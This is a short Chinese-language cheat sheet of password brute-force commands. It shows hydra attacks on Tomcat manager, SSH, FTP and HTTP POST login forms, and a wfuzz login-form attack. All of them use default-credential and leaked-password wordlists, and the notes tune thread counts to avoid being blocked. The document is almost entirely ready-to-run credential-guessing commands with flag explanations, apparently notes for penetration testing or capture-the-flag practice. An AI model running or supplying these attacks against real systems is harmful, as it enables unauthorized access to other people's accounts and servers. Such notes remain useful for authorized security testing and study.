Apache认证

cd /usr/share/seclists/

hydra -C Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://ip:port/manager/html

ssh/ftp密码认证

-l -L 设置用户名
-p -P 设置密码
小写为单个单词，大写为单词字典。
-t （默认16）设置线程数，防止太大被拦截

hydra -l user -P /root/Desktop/pass.txt **ip** ssh -t 4

hydra -L /root/Desktop/86/user.txt -P /usr/share/wordlists/500-worst-passwords.txt **ip** ftp

web-post表单认证

hydra -U http-post-form 查看帮助

cd /usr/share/seclists/Usernames
hydra -L top-usernames-shortlist.txt -P /usr/share/wordlists/500-worst-passwords.txt -f **ip** http-post-form "/admin.php:user=^USER^&pass=^PASS^:HERE"

/admin.php 是URI

user pass是抓包后看到的post参数

^USER^ 、^PASS^ 无需修改

HERE 是登陆错误的提示，需要修改为对应的标识。例如，Invalid credential，就可以在hydra里设置为Invalid

---

wfuzz -c --hl=18 -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt -d 'username=admin&password=FUZZ&submit=Login' http://{IP}/login

-d 设置burp拦截的登陆表单参数
-c 有颜色的输出
--h1 设置错误响应的长度，如果长度不是18，则说明找到正确密码
--hc 隐藏具体的响应代码，例如404,200之类的
FUZZ 是需要爆破替换的地址。
--basic 测试一个需要HTTP Basic Auth保护的内容
-z 扫描模式，可以字典扫描，数字范围扫描。。。